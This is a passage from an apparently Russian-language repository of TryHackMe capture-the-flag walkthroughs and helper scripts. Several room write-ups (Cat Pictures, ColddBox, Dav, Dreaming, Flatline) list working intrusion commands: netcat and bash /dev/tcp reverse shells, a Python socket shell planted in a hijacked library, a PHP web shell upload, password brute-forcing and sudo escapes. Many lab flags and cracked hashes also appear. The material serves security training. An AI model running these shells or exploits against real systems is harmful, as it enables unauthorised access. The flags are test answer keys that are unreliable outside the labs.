"eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==" | base64 -d 18 | mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 19 | mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "simple_massage" -h 20 | mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 21 | echo "SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk=" | base64 -d 22 | mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "e2lkOiAiY2RkMWIxYzDigJMxYzQw4oCTNGIwZi04ZTIy4oCTNjFiMzU3NTQ4YjdkIiwgY21kOiAiQ01EIiwgYXJnOiAibHMifQ==" -h 23 | mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 24 | echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZy50eHRcbij9" | base64 -d 25 | echo "{"id": "cdd1b1c0–1c40–4b0f-8e22–61b357548b7d", "cmd": "CMD", "arg": "cat flag.txt"}" | base64 26 | mosquitto_pub -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "e2lkOiBjZGQxYjFjMOKAkzFjNDDigJM0YjBmLThlMjLigJM2MWIzNTc1NDhiN2QsIGNtZDogQ01E 27 | mosquitto_sub -t "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub" -h 28 | echo "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3suLi4uLi4uLi4ufSJ9" | base64 -d 29 | ``` 30 | ```commandline 31 | flag{18d44fc0707ac8dc8be45bb83db54013} 32 | ``` 33 | 34 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/CTF collection Vol1/base-decoder.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Read input string from command prompt 4 | read -p "Enter the encoded string: " encoded_string 5 | 6 | # Display the original string 7 | echo 8 | echo "Original String: $encoded_string" 9 | echo 10 | # Decode using base32 11 | decoded_base32=$(echo "$encoded_string" | base32 -d) 12 | if [[ -n "$decoded_base32" ]]; then 13 | echo "Decoded (Base32): $decoded_base32" 14 | fi 15 | 16 | echo 17 | 18 | # Decode using base58 19 | decoded_base58=$(echo "$encoded_string" | base58 -d) 20 | if [[ -n "$decoded_base58" ]]; then 21 | echo "Decoded (Base58): $decoded_base58" 22 | fi 23 | 24 | echo 25 | 26 | # Decode using base64 27 | decoded_base64=$(echo "$encoded_string" | base64 -d) 28 | if [[ -n "$decoded_base64" ]]; then 29 | echo "Decoded (Base64): $decoded_base64" 30 | fi 31 | 32 | echo -------------------------------------------------------------------------------- /01.easy/CTF collection Vol1/rot1_25-bruteforce.py: -------------------------------------------------------------------------------- 1 | # rot1_25-bruteforce.py 2 | # Это скрипт ротации методом перебора ROT1 в ROT25. 3 | # Вы вводите зашифрованный текст, и скрипт выведет все потенциальные выходные данные в каждой схеме ROT 4 | 5 | 6 | def rot_decode ( cipher_text ): 7 | # Перебрать все возможные значения ROT (от 1 до 25) 8 | for rot in range ( 1 , 26 ): 9 | decoded_text = "" 10 | # Перебрать каждый символ в зашифрованном тексте 11 | for c in cipher_text: 12 | # Проверить, является ли символ буквой 13 | if c.isalpha(): 14 | # Определить смещение ASCII на основе того, является ли буква заглавной или строчной 15 | if c.isupper(): 16 | ascii_offset = 65 17 | else : 18 | ascii_offset = 97 19 | # Преобразовать символ в его код ASCII 20 | c_code = ord (c) 21 | # Определить новый код ASCII, применив значение ROT 22 | new_c_code = (c_code - ascii_offset + rot) % 26 + ascii_offset 23 | # Преобразовать новый код ASCII обратно в символ 24 | new_c = chr (new_c_code) 25 | decoded_text += new_c 26 | else : 27 | # Если символ не является буквой, добавить его к декодированному тексту как есть 28 | decoded_text += c 29 | # Вывести декодированный текст для текущего значения ROT 30 | print ( f"ROT {rot:02d} : {decoded_text} " ) 31 | 32 | 33 | # Запросить у пользователя ввод 34 | cipher_text = input ( "Введите зашифрованный текст: " ) 35 | rot_decode(cipher_text) -------------------------------------------------------------------------------- /01.easy/CTF collection Vol1/xor-strings.py: -------------------------------------------------------------------------------- 1 | # Prompt the user to enter the first string 2 | s1_input = input("Enter the first string: ") 3 | 4 | # Prompt the user to enter the second string 5 | s2_input = input("Enter the second string: ") 6 | 7 | # Convert the input strings to bytes 8 | s1 = bytes.fromhex(s1_input) 9 | s2 = bytes.fromhex(s2_input) 10 | 11 | # Perform the XOR operation on the corresponding bytes 12 | xor_result = bytes(a ^ b for a, b in zip(s1, s2)) 13 | 14 | # Convert the XOR result to ASCII and print 15 | ascii_result = xor_result.decode('ascii') 16 | print("XOR result (ASCII):", ascii_result) -------------------------------------------------------------------------------- /01.easy/CTF collection Vol2/answer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | for letter in {A..Z} {a..z}; do 4 | 5 | response=$(curl -X POST -H "Host: ctfvol2.thm" -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: http://ctfvol2.thm" -H "Referer: http://ctfvol2.thm/game1/" -H "Cookie: Invited=0" -H "Upgrade-Insecure-Requests: 1" --data "answer=$letter" --compressed --silent http://ctfvol2.thm/game1/) 6 | 7 | hash=$(echo "$response" | grep -oP '

Your hash:\s+\K\d+') 8 | 9 | echo "$letter : $hash" 10 | 11 | done -------------------------------------------------------------------------------- /01.easy/CTF collection Vol2/bpython.py: -------------------------------------------------------------------------------- 1 | # Определить двоичную строку 2 | b = '1000101011000010111001101110100011001010111001000100000001100010011011100111010001000000101010001001000010011010111101101101010 0011010101011111011010100011010101011111011010110011001101110000010111110110010000110011011000110011000001100100001100110 1111101' 3 | 4 | # Преобразовать двоичное число в десятичное 5 | d = int (b, 2 ) 6 | print (d) # Вывести десятичное представление 7 | 8 | # Преобразовать десятичное число в шестнадцатеричное 9 | h = hex (d)[ 2 :] 10 | print (h) # Вывести шестнадцатеричное представление 11 | 12 | # Преобразовать шестнадцатеричное число в ASCII 13 | ascii_text = bytes .fromhex(h).decode( 'ASCII' ) 14 | 15 | # Вывести ASCII-представление 16 | print (ascii_text) -------------------------------------------------------------------------------- /01.easy/Capture!.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Capture!](https://tryhackme.com/r/room/capture) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | SecureSolaCoders снова разработали веб-приложение. Они устали от хакеров, перечисляющих и эксплуатирующих их предыдущую форму входа. Они посчитали, что брандмауэр веб-приложений (WAF) слишком излишен и не нужен, поэтому они разработали свой собственный ограничитель скорости и немного изменили код . 8 | 9 | Прежде чем начать, загрузите необходимые файлы, нажав кнопку «Загрузить файлы задания» . 10 | 11 | ### Ответьте на вопросы ниже 12 | Я скачал файл capture.zip. 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | 17 | ## Задание 2 18 | Подождите примерно 3–5 минут, пока приложение запустится. 19 | 20 | Веб-приложение можно найти по адресу:http://MACHINE_IP 21 | 22 | ### Ответьте на вопросы ниже 23 | Каково значение flag.txt? 24 | ```commandline 25 | 7df2eabce36f02ca8ed7f237f77ea416 26 | ``` 27 | 28 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Cat Pictures 2.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Cat Pictures 2](https://tryhackme.com/r/room/catpictures2) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Разверните виртуальную машину , нажав зеленую кнопку «Запустить машину» . 8 | 9 | Примечание : дайте коробке запечься в течение 3–6 минут, прежде чем приступать к ее приготовлению! 10 | 11 | Все изображения кошек взяты с Unsplash. 12 | 13 | ### Ответьте на вопросы ниже 14 | Я развернул виртуальную машину. 15 | ```commandline 16 | Ответ не нужен 17 | ``` 18 | 19 | ## Задание 2 20 | Дайте мне флаги! 21 | ### Ответьте на вопросы ниже 22 | Что такое Флаг 1? 23 | ```commandline 24 | 10d916eaea54bb5ebe36b59538146bb5 25 | ``` 26 | Что такое Флаг 2? 27 | ```commandline 28 | 5e2cafbbf180351702651c09cd797920 29 | ``` 30 | Что такое Флаг 3? 31 | ```commandline 32 | 6d2a9f8f8174e86e27d565087a28a971 33 | ``` 34 | 35 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Cat Pictures.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 4 | 5 | # Комната [Cat Pictures](https://tryhackme.com/r/room/catpictures) 6 | 7 | Всего 2 задания: 8 | ## Задание 1 9 | Нажмите зеленую кнопку развертывания и атакуйте MACHINE_IP! 10 | 11 | ПРИМЕЧАНИЕ: запуск и настройка занимают некоторое время... некоторые службы запускаются и открывают порты медленно, 12 | поэтому наберитесь терпения. 13 | 14 | ### Ответьте на вопросы ниже 15 | Разверните меня! 16 | ```commandline 17 | Ответ не нужен 18 | ``` 19 | 20 | ## Задание 2 21 | Отдайте мне все флаги!!! 22 | ### Ответьте на вопросы ниже 23 | Флаг 1 24 | ```commandline 25 | nmap -sC -sV -p- 26 | gobuster dir -u http://:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 27 | for i in 1111 2222 3333 4444;do nmap -Pn -p $i --host-timeout 201 --max-retries 0 ; done 28 | ftp 29 | ls 30 | get note.txt 31 | cat note.txt 32 | password:sardinethecat 33 | nc 4420 34 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <4444> >/tmp/f 35 | nc -lvp 4444 36 | ls 37 | ./runme 38 | password: rebecca 39 | cd /home/catlover/ 40 | ls -la 41 | chmod 600 cat_rsa 42 | ssh -i cat_rsa catlover@ 43 | id 44 | ls -la 45 | cat /root/flag.txt 46 | ``` 47 | ```commandline 48 | 7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9 49 | ``` 50 | Корневой флаг 51 | ```commandline 52 | cat /opt/claen/clean.sh 53 | echo 'bash -i >& /dev/tcp//4422 0>&1' >> clean.sh 54 | nc -lvp 4422 55 | ``` 56 | ```commandline 57 | 4a98e43d78bab283938a06f38d2ca3a3c53f0476 58 | ``` 59 | 60 | 61 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/ColddBox Easy.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [ColddBox: Easy](https://tryhackme.com/r/room/colddboxeasy) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Сможете ли вы получить доступ и получить оба флага ? 8 | 9 | Удачи!. 10 | 11 | Автор Марти из Hixec. 12 | 13 | Сомнения и/или помощь в сообществе Hixec. 14 | 15 | Изображение миниатюры предоставлено Freepik с сайта www.flaticon.es 16 | 17 | ### Ответьте на вопросы ниже 18 | пользователь.txt 19 | ```commandline 20 | nmap -A -O -sC -sV -p- 21 | wpscan --url http:/// -e u -P /usr/share/wordlists/rockyou.txt 22 | # c0ldd:9876543210 23 | rlwrap nc -nlvp 4444 24 | python3 -c "import pty;pty.spawn('/bin/bash')" 25 | ls -la 26 | cat user.txt 27 | ls /var/www/html 28 | cat wp-config.php 29 | ssh c0ldd@ -p 4512 30 | cat user.txt 31 | cat user.txt | base64 -d 32 | ``` 33 | ```commandline 34 | RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ== 35 | ``` 36 | корень.txt 37 | ```commandline 38 | sudo -l 39 | sudo /usr/bin/vim 40 | :!/bin/bash 41 | 42 | cd /root/ 43 | cat root.txt | base64 -d 44 | ``` 45 | ```commandline 46 | wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE= 47 | ``` 48 | 49 | 50 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Compiled.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Compiled](https://tryhackme.com/r/room/compiled) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Загрузите файл задачи и начните. Бинарник также можно найти в AttackBox внутри/root/Rooms/Compiled/каталог. 8 | 9 | Примечание: двоичный файл не будет выполняться при использовании AttackBox. Однако вы все равно можете решить задачу. 10 | 11 | ### Ответьте на вопросы ниже 12 | Какой пароль? 13 | ```commandline 14 | DoYouEven_init 15 | ``` 16 | 17 | 18 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Corridor.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Corridor](https://tryhackme.com/r/room/corridor) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | При переходе в каждую комнату, ее Url содерижит хеш номера комнаты от 1 до 13, для получения флага нужно 8 | отредактировать этот хеш, хешом нулевой комнаты. 9 | ```commandline 10 | nmap -sV -sC 11 | echo -n "0" | md5sum 12 | http:///REDACTED 13 | ``` 14 | 15 | ```commandline 16 | flag{2477ef02448ad9156661ac40a6b8862e} 17 | ``` 18 | 19 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Couch.md: -------------------------------------------------------------------------------- 1 | 2 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 3 | 4 | # Комната [Couch](https://tryhackme.com/r/room/couch) 5 | 6 | Всего 1 заданиe: 7 | ## Задание 1 8 | Вы готовы принять вызов? 9 | Загрузка и настройкамашины может занять до 3 минут. 10 | ### Ответьте на вопросы ниже 11 | Просканируйте машину. Сколько портов открыто? 12 | ```commandline 13 | 2 14 | ``` 15 | Какая система управления базами данных установлена на сервере? 16 | ```commandline 17 | couchdb 18 | ``` 19 | На каком порту работает система управления базой данных? 20 | ```commandline 21 | 5984 22 | ``` 23 | Какая версия системы управления установлена на сервере? 24 | ```commandline 25 | 1.6.1 26 | ``` 27 | Каков путь к инструменту веб-администрирования этой системы управления базами данных? 28 | ```commandline 29 | _utils 30 | ``` 31 | Какой путь используется для просмотра списка всех баз данных в веб-браузере системы управления базами данных? 32 | ```commandline 33 | _all_dbs 34 | ``` 35 | Какие учетные данные можно найти в инструменте веб-администрирования? 36 | ```commandline 37 | atena:t4qfzcc4qN## 38 | ``` 39 | Взломайте машину и найдите user.txt 40 | ```commandline 41 | THM{1ns3cure_couchdb} 42 | ``` 43 | Повысить привилегии и получить root.txt 44 | ```commandline 45 | THM{RCE_us1ng_Docker_API} 46 | ``` 47 | 48 | 49 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Crack the hash.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Crack the hash]() 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Сможете ли вы выполнить задания уровня 1, взломав хеши? 8 | 9 | ### Ответить на вопросы ниже 10 | 48bb6e862e54f2a795ffc4e541caed4d 11 | ```commandline 12 | easy 13 | ``` 14 | CBFDAC6008F9CAB4083784CBD1874F76618D2A97 15 | ```commandline 16 | password123 17 | ``` 18 | 1C8BFE8F801D79745C4631D09FFF36C82AA37FC4CCE4FC946683D7B336B63032 19 | ```commandline 20 | letmein 21 | ``` 22 | $2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom 23 | ```commandline 24 | bleh 25 | ``` 26 | 279412f945939ba78ce0758d3fd83daa 27 | ```commandline 28 | Eternity22 29 | ``` 30 | 31 | ## Задание 2 32 | Это задание увеличивает сложность. Все ответы будут в списке паролей classic rock you. 33 | 34 | Вам, возможно, придется начать использовать hashcat здесь, а не онлайн-инструменты. Также может быть полезно 35 | посмотреть на некоторые примеры хэшей на странице hashcats. 36 | 37 | ### Ответить на вопросы ниже 38 | Хэш: F09EDCB1FCEFC6DFB23DC3505A882655FF77375ED8AA2D1C13F640FCCC2D0C85 39 | ```commandline 40 | paule 41 | ``` 42 | Хэш: 1DFECA0C002AE40B8619ECF94819CC1B 43 | ```commandline 44 | n63umy8lkf4i 45 | ``` 46 | Хэш: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02. 47 | Соль: Действительно Твёрдая Соль 48 | 49 | ```commandline 50 | waka99 51 | ``` 52 | Хэш: e5d8870e5bdd26602cab8dbe07a942c8669e56d6 53 | Соль: tryhackme 54 | ```commandline 55 | 481616481616 56 | ``` 57 | 58 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Creative.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Creative](https://tryhackme.com/r/room/creative) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Подождите около 5 минут, пока устройство загрузится должным образом. 8 | 9 | Для завершения комнаты отправьте как пользовательские, так и корневые флаги. 10 | 11 | ### Ответьте на вопросы ниже 12 | Что такое user.txt? 13 | ```commandline 14 | 9a1ce90a7653d74ab98630b47b8b4a84 15 | ``` 16 | 17 | Что такое root.txt? 18 | ```commandline 19 | 992bfd94b90da48634aed182aae7b99f 20 | ``` 21 | 22 | 23 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/CyberLens.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [CyberLens](https://tryhackme.com/r/room/cyberlensp6) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Описание задачи 8 | Добро пожаловать в тайный мир CyberLens, где тени танцуют среди цифрового домена, а метаданные раскрывают секреты, 9 | которые таятся в каждом изображении. Отправляясь в это захватывающее путешествие, приготовьтесь раскрыть скрытую 10 | матрицу информации, которая таится под поверхностью, поскольку здесь, в CyberLens, мы делаем метаданные нашей 11 | игровой площадкой. 12 | 13 | В этом лабиринтном мире кибербезопасности мы освоили тайные искусства цифровой криминалистики и анализа изображений. 14 | Вооруженные передовыми методами и передовыми инструментами, мы погружаемся в саму ткань цифровых изображений, снимая 15 | слои информации, чтобы раскрыть невидимые истории, которые они жаждут рассказать. 16 | 17 | Представьте себя современным исследователем, оснащенным не только техническими навыками, но и острым взглядом на 18 | детали. Наша команда элитных экспертов проведет вас по сложным путям анализа изображений, где структуры файлов и 19 | шаблоны данных предоставляют ценную информацию о происхождении и природе цифровых артефактов. 20 | 21 | В CyberLens мы верим, что каждый пиксель хранит историю, и наша миссия — расшифровать эти истории и извлечь правду. 22 | Присоединяйтесь к нам в этом захватывающем приключении, пока мы перемещаемся по цифровому ландшафту и раскрываем 23 | скрытые истории, которые ждут нас на каждом шагу. 24 | 25 | Можете ли вы взломать веб-сервер CyberLens и обнаружить скрытые флаги? 26 | 27 | Что следует отметить 28 | 1. Обязательно добавьте IP-адрес в файл /etc/hosts:sudo echo 'MACHINE_IP cyberlens.thm' >> /etc/hosts 29 | 2. Обязательно подождите 5 минут перед запуском, чтобы виртуальная машина полностью запустила каждую службу. 30 | 31 | ### Ответьте на вопросы ниже 32 | Что такое флаг пользователя? 33 | ```commandline 34 | THM{T1k4-CV3-f0r-7h3-w1n} 35 | ``` 36 | Что такое флаг администратора? 37 | ```commandline 38 | THM{3lev@t3D-4-pr1v35c!} 39 | ``` 40 | 41 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Cyborg.md: -------------------------------------------------------------------------------- 1 | 2 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 3 | 4 | # Комната [Cyborg](https://tryhackme.com/r/room/cyborgt8) 5 | 6 | Всего 2 задания: 7 | ## Задание 1 8 | Пожалуйста, разверните машину, чтобы вы могли начать. Пожалуйста, подождите несколько минут, чтобы убедиться, что 9 | все службы загрузились. Удачи! 10 | 11 | твиттер: fieldraccoon 12 | 13 | Ответить на вопросы ниже 14 | Разверните машину 15 | ```commandline 16 | Ответ не нужен 17 | ``` 18 | 19 | ## Задание 2 20 | Взломайте машину и прочитайте файлы user.txt и root.txt 21 | 22 | ### Ответить на вопросы ниже 23 | Просканируйте машину, сколько портов открыто? 24 | ```commandline 25 | 2 26 | ``` 27 | Какая служба работает на порту 22? 28 | ```commandline 29 | ssh 30 | ``` 31 | Какая служба работает на порту 80? 32 | ```commandline 33 | http 34 | ``` 35 | Что такое флаг user.txt? 36 | ```commandline 37 | flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3} 38 | ``` 39 | Что такое флаг root.txt? 40 | ```commandline 41 | flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d} 42 | ``` 43 | 44 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/DVWA.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [DVWA](https://tryhackme.com/r/room/dvwa) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | DVWA — это потрясающая виртуальная машина, которая обычно используется для обучения и тестирования новых инструментов. Эта комната не имеет руководства и действует исключительно как среда тестирования. 8 | 9 | Учетные данные для входа в систему можно легко найти в Интернете, но они также включены в подсказку ниже, если вы предпочитаете пойти по легкому пути. 10 | 11 | ### Ответьте на вопросы ниже 12 | Разверните виртуальную машину и начните взлом! 13 | ```commandline 14 | Ответ не нужен 15 | ``` 16 | 17 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Dav.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Dav](https://tryhackme.com/r/room/bsidesgtdav) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Прочитать user.txt и root.txt 8 | 9 | ### Ответьте на вопросы ниже 10 | пользователь.txt 11 | ```commandline 12 | nmap -sC -sV 13 | wget --http-user="wampp" --http-password="xampp" http:///webdav/passwd.dav 14 | cat passwd.dav 15 | # wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91 16 | curl -u "wampp:xampp" -X PUT http:///webdav/test 17 | cadaver http:///webdav 18 | # wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91 19 | put shell.php 20 | quit 21 | nc -nlvp 4444 22 | SHELL=/bin/bash script -q /dev/null 23 | cd /home/merlin/ 24 | cat user.txt 25 | ``` 26 | ```commandline 27 | 449b40fe93f78a938523b7e4dcd66d2a 28 | ``` 29 | корень.txt 30 | ```commandline 31 | sudo -l 32 | sudo cat /root/root.txt 33 | ``` 34 | ```commandline 35 | 101101ddc16b0cdf65ba0b8a7af7afa5 36 | ``` 37 | 38 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Dear QA.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Dear QA](https://tryhackme.com/r/room/dearqa) 4 | 5 | Всего 2 задания: 6 | ## Задание 1 7 | Загрузите двоичный файл, нажав кнопку «Загрузить файлы задач». 8 | ### Ответьте на вопросы ниже 9 | Проанализируйте двоичный файл в автономном режиме. 10 | 11 | ```commandline 12 | Ответ не нужен 13 | ``` 14 | 15 | ## Задание 2 16 | На порту 5700 запущена служба. Запустите машину с помощью зеленой кнопки в этой задаче. 17 | ### Ответьте на вопросы ниже 18 | Какова бинарная архитектура? 19 | ```commandline 20 | x64 21 | ``` 22 | Что такое флаг? 23 | ```commandline 24 | THM{PWN_1S_V3RY_E4SY} 25 | ``` 26 | 27 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Dreaming.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Dreaming](https://tryhackme.com/r/room/dreaming) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Пока король снов находился в заключении, его дом превратился в руины. 8 | 9 | Сможете ли вы помочь Песочному человеку восстановить его королевство? 10 | 11 | ### Ответьте на вопросы ниже 12 | Что такое флаг Люсьена? 13 | ```commandline 14 | nmap -sC -sV 15 | gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt 16 | # https://www.exploit-db.com/exploits/49909 17 | # http:///app/pluck-4.7.13/login.php 18 | admin:password 19 | # death, lucien, morpheus 20 | nc -lvnp 1234 21 | cd /opt 22 | ls 23 | password = "HeyLucien#@1999!" 24 | ssh lucien@ 25 | cat lucient_flug.txt 26 | ``` 27 | ```commandline 28 | THM{TH3_L1BR4R14N} 29 | ``` 30 | Что такое Флаг Смерти? 31 | ```commandline 32 | cat .bash_history 33 | mysql -u lucien -plucien42DBPASSWORD 34 | show databases; 35 | show tables; 36 | select * from dreams; 37 | UPDATE dreams SET dream = '; /bin/bash -p' WHERE dreamer = 'Alice'; 38 | select * from dreams; 39 | exit 40 | sudo -l 41 | sudo -u death /usr/bin/python3 /home/death/getDreams.py 42 | id 43 | chmod 777 /home/death/getDreams.py 44 | cat getDreams.py 45 | # death:!momentoMORI666! 46 | su death 47 | cat death_flag.txt 48 | ``` 49 | ```commandline 50 | THM{1M_TH3R3_4_TH3M} 51 | ``` 52 | Что такое Флаг Морфеуса? 53 | ```commandline 54 | cat /home/morpheus/restore.py 55 | find / -name shutil.py 2>/dev/null 56 | ls -lai /usr/lib/python3.8/shutil.py 57 | 58 | vim /usr/lib/python3.8/shutil.py 59 | import socket,subprocess,os 60 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 61 | s.connect(("",)) 62 | os.dup2(s.fileno(),0) 63 | os.dup2(s.fileno(),1) 64 | os.dup2(s.fileno(),2) 65 | p=subprocess.call(["/bin/sh","-i"]) 66 | 67 | nc -lnvp 1234 68 | sudo -l 69 | sudo su 70 | ``` 71 | ```commandline 72 | THM{DR34MS_5H4P3_TH3_W0RLD} 73 | ``` 74 | 75 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Flatline.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) 2 | 3 | # Комната [Flatline](https://tryhackme.com/r/room/flatline) 4 | 5 | Всего 1 заданиe: 6 | ## Задание 1 7 | Что такое флаги? 8 | 9 | Загрузка и выполнение операций на этом компьютере могут происходить медленнее, чем обычно. 10 | ### Ответьте на вопросы ниже 11 | Что такое флаг user.txt? 12 | ```commandline 13 | nmap -sC -sV 14 | nmap --script="rdp-*" -p 3389 -vv -Pn 15 | searchsploit freeswitch 16 | # https://www.exploit-db.com/exploits/47799 17 | python3 exploit.py whoami 18 | python3 exploit.py dir 19 | python3 exploit.py "dir C:\\Users\\" 20 | python3 exploit.py "dir C:\\Users\\Nekrotic\\Desktop\\" 21 | ``` 22 | ```commandline 23 | THM{64bca0843d535fa73eecdc59d27cbe26} 24 | ``` 25 | Что такое флаг root.txt? 26 | ```commandline 27 | searchsploit openclinic 28 | ``` 29 | ```commandline 30 | THM{8c8bc5558f0f3f8060d00ca231a9fb5e} 31 | ``` 32 | 33 | [>> вернуться на главную страницу](https://github.com/BEPb/tryhackme/blob/master/README.md) -------------------------------------------------------------------------------- /01.easy/Flip.md: -------------------------------------------------------------------------------- 1 | [>> вернуться на главную 